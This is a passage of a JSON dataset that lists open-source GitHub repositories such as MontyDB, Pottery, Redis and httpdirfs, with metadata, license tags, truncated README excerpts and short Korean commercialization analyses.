gRP","composite_score":0.0041,"license_safety_tag":"safe"},{"name":"davidlatwe/montydb","github_url":"https://github.com/davidlatwe/montydb","stars":12,"language":"Python","license":"BSD-3-Clause","abandonment_months":0,"description":"# MontyDB 상용화 분석\n\n## 왜 보물인가\nMongoDB처럼 쓸 수 있지만 별도 서버 없이 바로 사용할 수 있는 가벼운 데이터베이스로, 소규모 스타트업이나 개인 개발자들의 초기 개발 단계에서 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS**: 초기 스타트업을 위한 저비용 데이터 관리 클라우드 서비스로 월 구독 제공\n- **내부 업","readme_excerpt":"\n<img src=\"artwork/logo.png\" alt=\"drawing\" width=\"600\"/>\n\n[![Python package](https://github.com/davidlatwe/montydb/actions/workflows/python-package.yml/badge.svg)](https://github.com/davidlatwe/montydb/actions/workflows/python-package.yml)\n[![Version](http://img.shields.io/pypi/v/montydb.svg?style=flat)](https://pypi.python.org/pypi/montydb)\n[![PyPi downloads](https://img.shields.io/pypi/dm/montydb)](https://pypistats.org/packages/montydb)\n\n> Monty, Mongo tinified. MongoDB implemented in Python!\n\n_Inspired by [TinyDB](https://github.com/msiemens/tinydb) and it's extension [TinyMongo](https://github.com/schapman1974/tinymongo)_\n\n\n## What is it?\n\nA pure Python-implemented database that looks and works like [MongoDB](https://www.mongodb.com/).\n\n```python\n>>> from montydb import MontyClient\n\n>>> col = MontyClient(\":memory:\").db.test\n>>> col.insert_many( [{\"stock\": \"A\", \"qty\": 6}, {\"stock\": \"A\", \"qty\": 2}] )\n>>> cur = col.find( {\"stock\": \"A\", \"qty\": {\"$gt\": 4}} )\n>>> next(cur)\n{'_id': Objec","composite_score":0.0038,"license_safety_tag":"safe"},{"name":"vanniktech/gradle-code-quality-tools-plugin","github_url":"https://github.com/vanniktech/gradle-code-quality-tools-plugin","stars":9,"language":"Kotlin","license":"apache-2.0","abandonment_months":0,"description":"# gradle-code-quality-tools-plugin 분석\n\n## 왜 보물인가\n소프트웨어 개발 품질을 자동으로 점검하는 도구로, 버그와 오류를 사전에 발견하여 개발 비용을 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발사 내부 도구**: 소프트웨어 회사가 자체 개발팀의 코드 품질을 자동으로 감시하는 시스템\n2. **SaaS 서비스**","readme_excerpt":"# gradle-code-quality-tools-plugin\n\nGradle plugin that configures [Checkstyle](http://checkstyle.sourceforge.net/), [PMD](https://pmd.github.io/), [CPD](https://pmd.github.io/pmd-6.0.0/#cpd), [Lint](https://developer.android.com/studio/write/lint.html) & [Ktlint](https://github.com/shyiko/ktlint). All of these tools are also automatically hooked into the `check` gradle task. Below, I'll go more into depth how each of those plugins are configured.\n\nThis plugin requires Gradle 5.0 or later.\n\n# Set up\n\n**root/build.gradle**\n\n```gradle\nbuildscript {\n  repositories {\n    mavenCentral()\n    google()\n  }\n  dependencies {\n    classpath \"com.vanniktech:gradle-code-quality-tools-plugin:0.25.0\"\n  }\n}\n\napply plugin: \"com.vanniktech.code.quality.tools\"\n```\n\n### Snapshot\n\n```gradle\nbuildscript {\n  repositories {\n    maven { url \"https://oss.sonatype.org/content/repositories/snapshots\" }\n  }\n  dependencies {\n    classpath \"com.vanniktech:gradle-code-quality-tools-plugin:0.26.0-SNAPSHOT\"\n  }\n}\n\napply ","composite_score":0.0037,"license_safety_tag":"safe"},{"name":"pfusik/cito","github_url":"https://github.com/pfusik/cito","stars":6,"language":"C++","license":"GPL-3.0","abandonment_months":0,"description":"# pfusik/cito 분석 보고서\n\n## 왜 보물인가\n프로그래밍 언어를 더 쉽게 만들거나 변환할 수 있는 도구로, 소프트웨어 개발을 단순화하는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **교육용 SaaS**: 학생들이 프로그래밍을 배우기 위한 온라인 학습 플랫폼으로 제공\n2. **기업 개발 도구**: 대규모 소프트웨어 회사의 내부 코드 변환/최적화 ","readme_excerpt":"[![Travis CI](https://app.travis-ci.com/fusionlanguage/fut.svg?branch=master)](https://app.travis-ci.com/fusionlanguage/fut)\n[![GitHub Actions](https://github.com/fusionlanguage/fut/actions/workflows/test.yml/badge.svg)](https://github.com/fusionlanguage/fut/actions/workflows/test.yml)\n[![codecov](https://codecov.io/gh/fusionlanguage/fut/branch/master/graph/badge.svg?token=M7UX4WJKI3)](https://codecov.io/gh/fusionlanguage/fut)\n\nFusion Programming Language\n===========================\n\nFusion is a programming language designed for implementing reusable components\n(libraries) for C, C++, C#, D, Java, JavaScript, Python, Swift, TypeScript\nand OpenCL C, all from single codebase.\n\nA \"Hello, world\" library:\n\n```csharp\npublic class HelloFu\n{\n    public static string GetMessage()\n    {\n        return \"Hello, world!\";\n    }\n}\n```\n\ncan be translated to all the listed languages with:\n```\nfut -o hello.c,cpp,cs,d,java,js,py,swift,ts,cl hello.fu\n```\n\nThe translated code is lightweight (no virtual mac","composite_score":0.0036,"license_safety_tag":"restricted"},{"name":"WebKit/explainers","github_url":"https://github.com/WebKit/explainers","stars":18,"language":"HTML","license":"unknown","abandonment_months":0,"description":"# WebKit/explainers 분석\n\n## 왜 보물인가\n웹 브라우저의 핵심 기술인 WebKit을 만드는 애플이 공개한 기술 설명서 모음으로, 웹 표준 개발의 최전선에 있는 귀중한 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **웹 개발 교육 플랫폼**: 프로그래밍 학원이나 온라인 강의 사이트에서 최신 웹 기술 해설 콘텐츠로 활용\n2. **기업 기술 자","readme_excerpt":"# WebKit Explainers\n\nThis repo is a place where WebKit contributors may post [explainers](https://www.w3.org/TR/explainer-explainer/) of pre-standardization web platform feature ideas, and a place where these explainers can be discussed, refined, and readied for migration to appropriate standards bodies (such as the [Privacy CG](https://github.com/privacycg/) or [WICG](https://github.com/WICG)).\n\n## Explainers\n\n* [Centralized Consent API](CentralizedConsentAPI/)\n* [Controlling Animation Frame Rate](animation-frame-rate/)\n* [Coordinated media playback through MediaSession](MediaSessionCoordinator/)\n* [Declarative Web Push](DeclarativeWebPush/)\n* [\"remote\" CryptoKeys](remote-cryptokeys/)\n* [TextTrackCue enhancements for programmatic subtitle and caption presentation](texttracks/)\n* [TrackConfiguration API](TrackConfiguration/)\n* [UndoManager API](UndoManager/)\n* [Spatial Backdrop](spatial-backdrop/)\n* [CSS Spatial Layout](css-spatial/explainer.md)\n\n## Graduates\n\nProposals which have move","composite_score":0.0036,"license_safety_tag":"unknown"},{"name":"ascii-boxes/boxes","github_url":"https://github.com/ascii-boxes/boxes","stars":6,"language":"C","license":"gpl-3.0","abandonment_months":0,"description":"# ASCII Boxes 저장소 분석\n\n## 왜 보물인가\n텍스트로만 이루어진 문서나 코드에 예쁜 상자 모양의 테두리를 자동으로 그려주는 도구로, 기술 문서 작성을 더 깔끔하고 읽기 쉽게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 사용자가 기술 문서를 작성할 때 자동으로 서식을 정렬해주는 온라인 문서 편집 플랫폼\n2. **내","readme_excerpt":"[![Build Status](https://github.com/ascii-boxes/boxes/actions/workflows/boxes.yml/badge.svg)](https://github.com/ascii-boxes/boxes/actions/workflows/boxes.yml)\n[![Coverage](https://coveralls.io/repos/github/ascii-boxes/boxes/badge.svg?branch=master)](https://coveralls.io/github/ascii-boxes/boxes?branch=master)\n[![Latest Version](https://img.shields.io/github/v/release/ascii-boxes/boxes?label=latest)](https://boxes.thomasjensen.com/releases.html)\n\n# boxes\n\n**Command line ASCII boxes unlimited!**\n\n[Boxes](https://boxes.thomasjensen.com/) is a command line filter program which draws ASCII\nart boxes around your input text ([examples](https://boxes.thomasjensen.com/examples.html)).\n\n![example boxes](README-0.gif)\n\nFor more information, please visit [the website](https://boxes.thomasjensen.com/).\n\n## Download\n\nThe recommended way is to install *boxes* via your package manager. But many ways exist\nto get *boxes* onto your machine, [details here](https://boxes.thomasjensen.com/download.html).\n","composite_score":0.0036,"license_safety_tag":"restricted"},{"name":"technopagan/sqip","github_url":"https://github.com/technopagan/sqip","stars":5,"language":"TypeScript","license":"unlicense","abandonment_months":0,"description":"# technopagan/sqip 분석\n\n## 왜 보물인가\n웹사이트 이미지를 초고속으로 미리보기 이미지로 변환해주는 도구로, 웹사이트 로딩 속도를 크게 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **이미지 최적화 SaaS**: 블로그나 쇼핑몰 운영자들이 사진을 업로드하면 자동으로 빠른 미리보기 이미지를 생성해주는 웹서비스\n2. **전자상거래 내부","readme_excerpt":"# SQIP - a pluggable image converter with vector support\n\n[![npm](https://img.shields.io/npm/v/sqip.svg)](https://www.npmjs.com/package/sqip)\n[![npm](https://img.shields.io/npm/dm/sqip.svg)](https://www.npmjs.com/package/sqip)\n\n[![CircleCI](https://circleci.com/gh/axe312ger/sqip.svg?style=svg)](https://circleci.com/gh/axe312ger/sqip)\n[![codecov](https://codecov.io/gh/axe312ger/sqip/branch/master/graph/badge.svg)](https://codecov.io/gh/axe312ger/sqip)\n[![Maintainability](https://api.codeclimate.com/v1/badges/fc81fa5e535561c0a6ff/maintainability)](https://codeclimate.com/github/axe312ger/sqip/maintainability)\n[![Contributor Covenant](https://img.shields.io/badge/Contributor%20Covenant-v1.4%20adopted-ff69b4.svg)](CODE_OF_CONDUCT.md)\n\n**SQIP** is a flexible, and a little bit different image processor. It is available as node API and CLI.\n\nBy combining plugins you can use it for several purposes:\n\n- Create super-tiny image previews to improve your websites lazy loading experience\n- Do art b","composite_score":0.0035,"license_safety_tag":"unknown"},{"name":"brainix/pottery","github_url":"https://github.com/brainix/pottery","stars":5,"language":"Python","license":"apache-2.0","abandonment_months":0,"description":"# Pottery (brainix/pottery) 분석\n\n## 왜 보물인가\n복잡한 데이터를 저장하고 관리하는 작업을 간단하게 만들어주는 도구로, 많은 기업이 필요로 하는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 데이터 저장이 필요한 클라우드 앱(협업 도구, 프로젝트 관리 플랫폼)의 백엔드 기술로 제공\n- **내부 업무 도구*","readme_excerpt":"# Pottery: Redis for Humans 🌎🌍🌏\n\n[Redis](http://redis.io/) is awesome, but [Redis\ncommands](http://redis.io/commands) are not always intuitive.  Pottery is a\nPythonic way to access Redis.  If you know how to use Python dicts, then you\nalready know how to use Pottery.  Pottery is useful for accessing Redis more\neasily, and also for implementing microservice resilience patterns; and it has\nbeen battle tested in production at scale.\n\n[![Build status](https://img.shields.io/github/actions/workflow/status/brainix/pottery/python-package.yml?branch=master)](https://github.com/brainix/pottery/actions?query=branch%3Amaster)\n[![Security status](https://img.shields.io/badge/security-bandit-dark.svg)](https://github.com/PyCQA/bandit)\n[![Latest released version](https://badge.fury.io/py/pottery.svg)](https://badge.fury.io/py/pottery)\n\n![Supported Python versions](https://img.shields.io/pypi/pyversions/pottery)\n\n[![Total number of downloads](https://pepy.tech/badge/pottery)](https://pepy.tech/projec","composite_score":0.0034,"license_safety_tag":"safe"},{"name":"songzhibin97/gkit","github_url":"https://github.com/songzhibin97/gkit","stars":5,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"# gkit 저장소 분석\n\n## 왜 보물인가\n개발자들이 자주 사용하는 작은 기능들을 모아놓은 유용한 도구 모음으로, 반복적인 작업을 빠르게 처리할 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 기업의 개발팀이 일상적인 코딩 업무를 자동화하는 회사 전용 소프트웨어로 활용\n- **SaaS 서비스**: 개발자 커뮤니티를 대상으로 유","readme_excerpt":"# GKIT\n\n```\n_____/\\\\\\\\\\\\\\\\\\\\\\\\__/\\\\\\________/\\\\\\__/\\\\\\\\\\\\\\\\\\\\\\__/\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\_        \n ___/\\\\\\//////////__\\/\\\\\\_____/\\\\\\//__\\/////\\\\\\///__\\///////\\\\\\/////__       \n  __/\\\\\\_____________\\/\\\\\\__/\\\\\\//_________\\/\\\\\\___________\\/\\\\\\_______      \n   _\\/\\\\\\____/\\\\\\\\\\\\\\_\\/\\\\\\\\\\\\//\\\\\\_________\\/\\\\\\___________\\/\\\\\\_______     \n    _\\/\\\\\\___\\/////\\\\\\_\\/\\\\\\//_\\//\\\\\\________\\/\\\\\\___________\\/\\\\\\_______    \n     _\\/\\\\\\_______\\/\\\\\\_\\/\\\\\\____\\//\\\\\\_______\\/\\\\\\___________\\/\\\\\\_______   \n      _\\/\\\\\\_______\\/\\\\\\_\\/\\\\\\_____\\//\\\\\\______\\/\\\\\\___________\\/\\\\\\_______  \n       _\\//\\\\\\\\\\\\\\\\\\\\\\\\/__\\/\\\\\\______\\//\\\\\\__/\\\\\\\\\\\\\\\\\\\\\\_______\\/\\\\\\_______ \n        __\\////////////____\\///________\\///__\\///////////________\\///________                                 \n```\n \n##### Translate to: [简体中文](README_zh.md)\n\n# Project Description\nDedicated to providing microservices and monolithic services of the availability of a collection of basic component tools, drawing on some of the best open source projects such as : `","composite_score":0.0034,"license_safety_tag":"safe"},{"name":"libyal/libvmdk","github_url":"https://github.com/libyal/libvmdk","stars":6,"language":"C","license":"lgpl-3.0","abandonment_months":0,"description":"# libvmdk 상용화 분석\n\n## 왜 보물인가\n컴퓨터의 가상 저장장치 파일을 읽고 분석할 수 있는 핵심 도구로, 데이터 복구, 보안 조사, 시스템 분석이 필요한 기업들의 필수 기반 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **포렌식 분석 SaaS**: 법무팀이나 수사기관이 압수된 컴퓨터 파일을 클라우드에서 안전하게 분석하는 웹 서비스\n2. **데이","readme_excerpt":"libvmdk is a library to access the VMware Virtual Disk (VMDK) format.\n\nProject information:\n\n* Status: alpha\n* Licence: LGPL-3.0-or-later\n\nRead supported extent file formats:\n\n* RAW (flat)\n* COWD version 1 (sparse)\n* VMDK version 1, 2 and 3 (sparse)\n\nSupported VMDK format features:\n\n* delta links\n* grain compression (as of version 20131209)\n* data markers (as of version 20140416)\n\nVMDK format features not supported at the moment:\n\n* images that use a physical device\n* changed block tracking (CBT) (supported by VMDK version 3 (sparse)) / change tracking file\n\nWork in progress:\n\n* Dokan library support\n* Thread-safety in handle API functions\n\nFor more information see:\n\n* Project documentation: https://github.com/libyal/libvmdk/wiki/Home\n* How to build from source: https://github.com/libyal/libvmdk/wiki/Building\n\n","composite_score":0.0034,"license_safety_tag":"restricted"},{"name":"exsilium/cloud9","github_url":"https://github.com/exsilium/cloud9","stars":5,"language":"JavaScript","license":"gpl-3.0","abandonment_months":0,"description":"# exsilium/cloud9 상용화 분석\n\n## 왜 보물인가\n개발자들이 웹 브라우저에서 코드를 작성하고 실행할 수 있는 통합 개발 환경으로, 설치 없이 어디서나 프로그래밍 작업을 할 수 있게 해주는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **교육용 SaaS 플랫폼**: 프로그래밍 학원이나 온라인 강의 서비스에서 학생들이 별도 설치 없이 즉시","readme_excerpt":"[![Build Status](https://github.com/pylonide/pylon/actions/workflows/nodejs.yml/badge.svg)](https://github.com/pylonide/pylon/actions/workflows/nodejs.yml)\n[![Master Dependency Status](https://snyk.io/test/github/pylonide/pylon/badge.svg)](https://snyk.io/test/github/pylonide/pylon)\n[![Development Dependency Status](https://snyk.io/test/github/pylonide/pylon/development/badge.svg)](https://snyk.io/test/github/pylonide/pylon/development)\n[![Bitcoin donate button](https://img.shields.io/badge/bitcoin-donate-yellow.svg)](https://commerce.coinbase.com/checkout/5f3b0455-32ba-4b85-b299-00fe739d8b10 \"One-time donation to keep this project alive\")\n[![€ donate button](https://img.shields.io/badge/€-donate-brightgreen.svg)](http://warp.pylon.id \"One-time donation to keep this project alive, choose the amount at checkout\")\n\n# Pylon IDE\n\nPylon is a web based integrated development environment built with Node.js as a backend and with a supercharged JavaScript/HTML5 frontend, licensed under [GPL ver","composite_score":0.0033,"license_safety_tag":"restricted"},{"name":"supabase/walrus","github_url":"https://github.com/supabase/walrus","stars":6,"language":"PLpgSQL","license":"Apache-2.0","abandonment_months":0,"description":"# Supabase Walrus 분석 보고서\n\n## 왜 보물인가\n대규모 데이터를 안전하게 저장하고 관리할 수 있는 오픈소스 기술로, 클라우드 저장소 시장에서 기존 상용 서비스를 대체할 수 있는 잠재력이 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 사용자 파일 저장 기능이 필요한 협업 도구나 클라우드 드라이브 서비스의 백엔드로 활용\n2","readme_excerpt":"# `walrus`\n<p>\n\n<a href=\"\"><img src=\"https://img.shields.io/badge/postgresql-12+-blue.svg\" alt=\"PostgreSQL version\" height=\"18\"></a>\n<a href=\"https://github.com/supabase/wal_rls/blob/master/LICENSE\"><img src=\"https://img.shields.io/pypi/l/markdown-subtemplate.svg\" alt=\"License\" height=\"18\"></a>\n\n\n</p>\n\n---\n\n**Source Code**: <a href=\"https://github.com/supabase/walrus\" target=\"_blank\">https://github.com/supabase/walrus</a>\n\n---\n\nWrite Ahead Log Realtime Unified Security (WALRUS) is a utility for managing realtime subscriptions to tables and applying row level security rules to those subscriptions.\n\nThe subscription stream is based on logical replication slots.\n\n## Summary\n### Managing Subscriptions\n\nUser subscriptions are managed through a table\n\n```sql\ncreate table realtime.subscription (\n    id bigint generated always as identity primary key,\n    subscription_id uuid not null,\n    entity regclass not null,\n    filters realtime.user_defined_filter[] not null default '{}',\n    claims js","composite_score":0.0033,"license_safety_tag":"safe"},{"name":"daangn/karrot-ui","github_url":"https://github.com/daangn/karrot-ui","stars":18,"language":"TypeScript","license":"Apache-2.0","abandonment_months":0,"description":"# Karrot-UI 상용화 분석\n\n## 왜 보물인가\n당근마켓처럼 성공한 앱의 디자인 시스템을 바로 가져다 쓸 수 있어서, 새로운 앱을 만들 때 디자인 작업 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 구독하는 '앱 디자인 키트' 서비스로, 매달 정해진 비용으로 최신 디자인 업데이트를 받음\n2. **내","readme_excerpt":"![cover](./cover.png)\n\n**Definitions**\n\n- [@seed-design/rootage](./packages/rootage)\n- [@seed-design/qvism-preset](./packages/qvism-preset)\n\n**Base Libraries**\n\n- [@seed-design/css](./packages/css)\n\n**React Libraries**\n\n- [@seed-design/react-headless](./packages/react-headless)\n- [@seed-design/react](./packages/react)\n- [@seed-design/stackflow](./packages/stackflow)\n\n**Integrations**\n\n- [@seed-design/figma](./packages/figma)\n- [@seed-design/mcp](./packages/mcp)\n\n**Ecosystem**\n\n- [@seed-design/ecosystem/rootage](./ecosystem/rootage)\n- [@seed-design/ecosystem/qvism](./ecosystem/qvism)\n- [@seed-design/ecosystem/figma-extractor](./ecosystem/figma-extractor)\n\n**Documentation**\n\n- [@seed-design/docs](./docs)\n","composite_score":0.0032,"license_safety_tag":"safe"},{"name":"fangfufu/httpdirfs","github_url":"https://github.com/fangfufu/httpdirfs","stars":15,"language":"C","license":"NOASSERTION","abandonment_months":0,"description":"# httpdirfs 저장소 분석\n\n## 왜 보물인가\n웹 서버의 파일들을 마치 자신의 컴퓨터 폴더처럼 접근할 수 있게 만들어주는 도구로, 원격 파일 관리를 획기적으로 간편하게 합니다.\n\n## 어디에 쓸 수 있나\n\n1. **클라우드 스토리지 SaaS**: 기존 클라우드 드라이브(구글 드라이브, 원드라이브)처럼 웹 저장소를 로컬 폴더처럼 쓰게 해주는 서비스\n2","readme_excerpt":"[![CodeQL](https://github.com/fangfufu/httpdirfs/actions/workflows/codeql.yml/badge.svg)](https://github.com/fangfufu/httpdirfs/actions/workflows/codeql.yml)\n[![CodeFactor](https://www.codefactor.io/repository/github/fangfufu/httpdirfs/badge)](https://www.codefactor.io/repository/github/fangfufu/httpdirfs)\n[![Codacy Badge](https://app.codacy.com/project/badge/Grade/30af0a5b4d6f4a4d83ddb68f5193ad23)](https://app.codacy.com/gh/fangfufu/httpdirfs/dashboard?utm_source=gh&utm_medium=referral&utm_content=&utm_campaign=Badge_grade)\n[![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=fangfufu_httpdirfs&metric=alert_status)](https://sonarcloud.io/summary/new_code?id=fangfufu_httpdirfs)\n\n# HTTPDirFS - HTTP Directory Filesystem with a permanent cache, and Airsonic / Subsonic server support\n\nHave you ever wanted to mount those HTTP directory listings as if it was a\npartition? Look no further, this is your solution. HTTPDirFS stands for Hyper\nText Transfer Protocol Dire","composite_score":0.0031,"license_safety_tag":"unknown"},{"name":"scivision/fortran-pathlib","github_url":"https://github.com/scivision/fortran-pathlib","stars":6,"language":"C++","license":"MIT","abandonment_months":0,"description":"# Fortran-Pathlib 기술 분석\n\n## 왜 보물인가\n과학 계산용 프로그래밍 언어인 포트란에서 파일 경로를 쉽게 관리할 수 있게 해주는 도구로, 복잡한 데이터 처리 작업을 단순화합니다.\n\n## 어디에 쓸 수 있나\n\n1. **기후 데이터 분석 SaaS**: 기상청, 환경 연구소 등이 대규모 기후 데이터를 자동으로 정리하는 웹 서비스로 제공\n2. **","readme_excerpt":"# Ffilesystem: platform-independent, compiler-agnostic path manipulation and filesystem library\n\n[![DOI](https://zenodo.org/badge/433875623.svg)](https://zenodo.org/badge/latestdoi/433875623)\n[![ci](https://github.com/scivision/ffilesystem/actions/workflows/ci.yml/badge.svg)](https://github.com/scivision/ffilesystem/actions/workflows/ci.yml)\n[![ci_windows](https://github.com/scivision/ffilesystem/actions/workflows/ci_windows.yml/badge.svg)](https://github.com/scivision/ffilesystem/actions/workflows/ci_windows.yml)\n[![oneapi-linux](https://github.com/scivision/ffilesystem/actions/workflows/oneapi-linux.yml/badge.svg)](https://github.com/scivision/ffilesystem/actions/workflows/oneapi-linux.yml)\n[![ci_fpm](https://github.com/scivision/ffilesystem/actions/workflows/ci_fpm.yml/badge.svg)](https://github.com/scivision/ffilesystem/actions/workflows/ci_fpm.yml)\n[![ci_meson](https://github.com/scivision/ffilesystem/actions/workflows/ci_meson.yml/badge.svg)](https://github.com/scivision/ffilesys","composite_score":0.0031,"license_safety_tag":"safe"},{"name":"FirmaChain/firma-station","github_url":"https://github.com/FirmaChain/firma-station","stars":14,"language":"TypeScript","license":"unknown","abandonment_months":0,"description":"# FirmaChain/firma-station 보물 분석\n\n## 왜 보물인가\n블록체인 기술을 활용하여 문서와 계약서의 위조를 방지하고 진위를 증명할 수 있는 기술이므로, 법적 효력이 필요한 모든 산업에서 수요가 높습니다.\n\n## 어디에 쓸 수 있나\n1. **부동산 계약 플랫폼**: 전자 계약서의 진위 증명으로 사기 방지 및 거래 신뢰도 향상\n2. **의료","readme_excerpt":"# Firma Station - Desktop & Web App Wallet Service\n\n![screen](https://user-images.githubusercontent.com/89889026/145321320-d5ae624b-0426-4203-b1c7-daae92a2b8ee.png)\n\n## Overview\n\nFirma Station is a desktop application for FirmaChain service like wallet, staking, voting.\n\nThis app is required for Mainnet Coin swaps service, and MainNet wallets can only be created through this app on user side.\n\nBoth Web and Desktop apps are being developed to work, and will be modularized so that they can be used in mobile wallets in the future.\n\nIt is currently under development and early stage development and provide detail features through integration with Firma-JS.\n\nThis app can also be used for TestNet and using Faucet, you can test various scenarios.\n\n**WARNING**: The coin obtained through firma station devnet/testnet is not compatible with the coin of mainnet and has no value.\n\n## Features\n\n- **Wallet Management**: Create wallets, recover from mnemonic, import private keys\n- **Hardware Wallet**: ","composite_score":0.0031,"license_safety_tag":"unknown"},{"name":"jtlandis/ggside","github_url":"https://github.com/jtlandis/ggside","stars":7,"language":"R","license":"NOASSERTION","abandonment_months":0,"description":"# ggside 저장소 분석\n\n## 왜 보물인가\n데이터를 시각화할 때 여러 각도에서 동시에 볼 수 있게 해주는 도구로, 복잡한 정보를 더 쉽게 이해할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 데이터 분석 플랫폼에서 고객들이 판매, 재고, 수익을 다각도로 볼 수 있는 대시보드 제공\n- **내부 업무 도구**: 마케팅팀이 광고 성과","readme_excerpt":"# README\nJustin Landis\n2025-11-24\n\n# ggside <a href=\"https://jtlandis.github.io/ggside/\"><img src=\"inst/figures/ggside.png\" align=\"right\" style=\"float:right\" height=\"200\" alt=\"plyxp website\" /></a>\n\n<!-- badges: start -->\n\n[![CRAN_Status_Badge](http://www.r-pkg.org/badges/version-ago/ggside)](https://cran.r-project.org/package=ggside)\n[![CRAN_Download_Badge](http://cranlogs.r-pkg.org/badges/ggside)](https://cran.r-project.org/package=ggside)\n[![CRAN_Download_Badge](http://cranlogs.r-pkg.org/badges/grand-total/ggside)](https://cran.r-project.org/package=ggside)\n[![R-CMD-check](https://github.com/jtlandis/ggside/actions/workflows/R-CMD-check.yaml/badge.svg)](https://github.com/jtlandis/ggside/actions/workflows/R-CMD-check.yaml)\n[![Codecov test\ncoverage](https://codecov.io/gh/jtlandis/ggside/branch/main/graph/badge.svg)](https://app.codecov.io/gh/jtlandis/ggside?branch=main)\n<!-- badges: end -->\n\nThe R package ggside expands on the ggplot2 package. This package allows\nthe user to add grap","composite_score":0.0029,"license_safety_tag":"unknown"},{"name":"antirez/redis","github_url":"https://github.com/antirez/redis","stars":16,"language":"C","license":"bsd-3-clause","abandonment_months":0,"description":"","readme_excerpt":"[![codecov](https://codecov.io/github/redis/redis/graph/badge.svg?token=6bVHb5fRuz)](https://codecov.io/github/redis/redis)\n\nThis document serves as both a quick start guide to Redis and a detailed resource for building it from source.\n\n- New to Redis? Start with [What is Redis](#what-is-redis) and [Getting Started](#getting-started)\n- Ready to build from source? Jump to [Build Redis from Source](#build-redis-from-source)\n- Want to contribute? See the [Code contributions](#code-contributions) section\n  and [CONTRIBUTING.md](./CONTRIBUTING.md)\n- Looking for detailed documentation? Navigate to [redis.io/docs](https://redis.io/docs/)\n\n## Table of contents\n\n- [What is Redis?](#what-is-redis)\n  - [Key use cases](#key-use-cases)\n- [Why choose Redis?](#why-choose-redis)\n- [What is Redis Open Source?](#what-is-redis-open-source)\n- [Getting started](#getting-started)\n  - [Redis starter projects](#redis-starter-projects)\n  - [Using Redis with client libraries](#using-redis-with-client-libraries)","composite_score":0.0028,"license_safety_tag":"safe"},{"name":"sebastianbergmann/php-timer","github_url":"https://github.com/sebastianbergmann/php-timer","stars":9,"language":"PHP","license":"bsd-3-clause","abandonment_months":0,"description":"# PHP Timer 저장소 분석\n\n## 왜 보물인가\n프로그램 실행 속도를 정확히 측정하고 기록하는 작은 도구로, 웹사이트나 앱의 성능 문제를 빠르게 찾아낼 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 성능 모니터링 서비스**: 고객의 웹사이트 속도를 자동으로 측정하고 리포트를 제공하는 구독 서비스\n2. **내부 업무 도구**: 회사의 자동화","readme_excerpt":"# phpunit/php-timer\n\n[![Latest Stable Version](https://poser.pugx.org/phpunit/php-timer/v)](https://packagist.org/packages/phpunit/php-timer)\n[![CI Status](https://github.com/sebastianbergmann/php-timer/workflows/CI/badge.svg)](https://github.com/sebastianbergmann/php-timer/actions)\n[![codecov](https://codecov.io/gh/sebastianbergmann/php-timer/branch/main/graph/badge.svg)](https://codecov.io/gh/sebastianbergmann/php-timer)\n\nUtility class for timing things, factored out of PHPUnit into a stand-alone component.\n\n## Installation\n\nYou can add this library as a local, per-project dependency to your project using [Composer](https://getcomposer.org/):\n\n```\ncomposer require phpunit/php-timer\n```\n\nIf you only need this library during development, for instance to run your project's test suite, then you should add it as a development-time dependency:\n\n```\ncomposer require --dev phpunit/php-timer\n```\n\n## Usage\n\n### Basic Timing\n\n```php\nrequire __DIR__ . '/vendor/autoload.php';\n\nuse SebastianBergma","composite_score":0.0027,"license_safety_tag":"safe"},{"name":"error0702/jvm-study","github_url":"https://github.com/error0702/jvm-study","stars":11,"language":"C++","license":"Apache-2.0","abandonment_months":0,"description":"# jvm-study 저장소 분석\n\n## 왜 보물인가\n자바 프로그래밍의 핵심 원리를 배울 수 있는 학습 자료로, 초보자부터 개발자까지 컴퓨터 동작 원리를 이해하는 데 도움이 되는 교육 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 자바 프로그래밍 강의 콘텐츠로 제공하는 유료 구독 서비스\n2. **기업 교육 도구**: IT 회사 ","readme_excerpt":"# jvm-study\n## jvm-study是什么 \n\n> 这是一个学习JVM源码的仓库. 通过这个仓库,可以学习到JVM相关的知识. \n\n> 说明: 本仓库主要是基于 OpenJDK 8 / HotSpot 源码阅读过程整理的学习笔记。部分内容用于记录当时的理解过程, 不等同于 JVM 规范或所有 JDK 版本的实现说明。\n\n## jvm 学习大纲\n\n### 1. 编译JVM\n* [x] [1.1 OpenJDK编译教程](src/autorun/jvm/enviment/ENVIMENT_INIT.md)\n* [x] [1.2 配置调试环境](src/autorun/jvm/enviment/IDE_DEBUG.md) </br>\n\n### 2. JNI\n* [x] [2.1 初识JNI](src/autorun/jvm/jni/README.md) </br>\n* [x] [2.2 JNIEnv相关API](src/autorun/jvm/jni/JNIEnvAPI.md) </br>\n* [x] [2.3 JNI初始化过程](src/autorun/jvm/jni/JNI_INIT.md)\n\n### 3. jvm启动流程剖析\n* [x] [3.1 jvm启动流程1](src/autorun/jvm/start/README.md) </br>\n* [ ] [3.2 jvm启动流程2](src/autorun/jvm/start/README2.md) </br>\n* [ ] [3.3 jvm启动流程3](src/autorun/jvm/start/README3.md) </br>\n* [ ] [3.4 jvm启动流程4](src/autorun/jvm/start/README4.md) </br>\n\n### 4. 面向对象OOP模型\n* [ ] [4.1 OOP KLASS模型](src/autorun/jvm/oop/OOP.md) </br>\n* [ ] [4.2 指针压缩](src/autorun/jvm/oop/Compressed_Oops.md) </br>\n* [ ] [4.3 内存编织](src/autorun/jvm/oop/Memory_Weave.md) </br>\n\n### 5. 方法调用\n* [ ] [5.1 